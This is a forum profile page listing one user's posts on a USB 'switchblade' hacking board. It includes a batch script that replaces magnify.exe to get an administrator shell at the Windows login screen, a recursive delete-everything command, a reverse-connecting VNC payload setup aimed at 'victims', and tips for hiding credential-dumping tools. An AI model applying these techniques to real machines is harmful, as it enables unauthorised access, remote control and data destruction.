
Joerg

Active Members
  • Posts

    305

Everything posted by Joerg

  1. I recommend you try the reverse VNC. Otherwise you have to hack every router to get VNC ;)
  2. Ehm, if you try this you'll get some nice errors ;) I'm booting from a DOS floppy, so I don't have system variables. If it were so easy, I would have done this. A problem I spotted is that, if someone has more than just 1 Windows NT system installed, the script just copies it once.
  3. Yes, your script works for all standard XP/Vista machines. My script works for all 2000/XP/Vista systems installed on another partition than C:. For me it is more important to make the script work on any PC (running Windows).
  4. Yeah, I love posting nonsense ;) I meant that Windows didn't replace the patched files after a forced reboot, but I think it's because I deactivated the SFC on my VM, so never mind and ignore this and my last post.
  5. I suggest unerasing the important files before installing something new.
  6. Why not make a batch using the "del" command?
  7. ? Do you mean that government computers are using Windows 9x with extensions (sounds weird) or an NT system?
  8. Sparda, I did this so often in a VM ;) It should be del /f /s /q /a C:*
  9. Maybe a skiddie "attack". It's very easy to delete the whole system via batch -- If there are important files you can try to unerase them.
  10. By the way, I tested the system file protection of Windows XP. I replaced the files and hit reset on my virtual machine. After that, the files were still there (replaced). Can someone confirm this?
  11. My idea is to first set up a reverse shell, then call via the shell a batch which starts the VNC process with parameters. -> You only have VNC if you really need it // With my switchblade I had the issue that every 15 min a VNC window appeared and that was bad
  12. I used ntfs4dos, but I'm sure there are better solutions. You format the disc using the ntfs4dos prog and copy the files of bootdisc.zip onto the disc. // note to myself: read
  13. // I'm running a password stripper with the -tabledance option, that's nice! Check the wiki for further information
  14. Nope, because the cd laser emits infrared rays. You still could get blinded, but you wouldn't see the beam.
  15. Ehm, I actually did that some time ago ;)
      @echo on
      FOR %i IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO IF EXIST %i:\ntldr SET SYS=%i
      FOR %a IN (windows winnt) DO IF EXIST %sys%:\%a\system32\winlogon.exe SET WIN=%a
      copy ".\magnify.exe" "%SYS%:\%win%\system32\dllcache\magnify.exe" /Y
      copy ".\magnify.exe" "%SYS%:\%win%\system32\magnify.exe" /Y
      This does work on 2k and on XP. And I set up a bootdisc with ntfs4dos, look here
  16. And of course, there are open access points at every corner.
  17. To avoid the "port forwarding issue" I modified my payload so the victim connects to my PC. So you only have to make a forwarding at your router, which is very useful. Quick'n dirty howto:
      1. Get a dyndns account to provide the current IP address
      2. Write some code to let the vnc.exe connect to your static hostname
      3. Get the vncviewer and run it in the listener mode
      If you'd like I can provide the code.
  18. Usually you can route the error messages to /dev/null via the 2>nul appendix: command 2>nul
  19. @kickarse: the magnify.exe is a system file, so replacing is only possible by an administrator (or a person having admin rights) or by booting from another OS. But it can be started by everyone. The difficult part is that you need admin rights instantly and not the dirty way by booting another operating system. EDIT: http://oxid.netsons.org/phpBB2/viewtopic.php?p=4578 To make a long story short, you create a service which calls the cmd.exe with SYSTEM rights. To prove that you have system rights, you can change into the system volume information folder. But as always, you need admin rights.
  20. The idea itself is not new, but the use could be ;) If you're using the standard switchblade and would like to change some paths (e.g. installation path, cmd-path, ...) you would have to edit nearly your whole batch. One solution would be using variables specified in each batch, but that still means changing a handful of batches. The solution: a simple txt file containing the data. The file "locations.ini" containing the paths
      ...
      cmd=the.folder.without.variable
      dmp=dump
      ...
      and a line of code in every batch file which sets the variables
      for /f %%i IN (.\locations.ini) do set %%i
      An example: .\%cmd%\iepv.exe --> .\the.folder.without.variable\iepv.exe
      So without editing a normal or compiled batch, paths can be changed without great effort. This could be useful for:
      - changing the active components of the switchblade without editing or compiling a batch
      - changing the folder names created on the PC in order to be more "invisible"
      - changing the "runlist" of programs to dump information
      ...
  21. It seems that Tor servers are still blocked ERROR : Closing link (xxxxx@ERR.CYLAB.CMU.EDU) [G-Lined: Your IP, xxx.xxx.xxx.xxx, is in our TOR Server List]
  22. I did set up a bootdisk with ntfs4dos to copy a compiled batch into the system32 folder (magnify.exe). By pressing {Win}+{U} and starting the magnifier you have an administrator account. This does not require administrator rights, but needs physical access.
  23. The problem with truecrypt is, that you need the driver installed on the system if you're not an admin to work with it.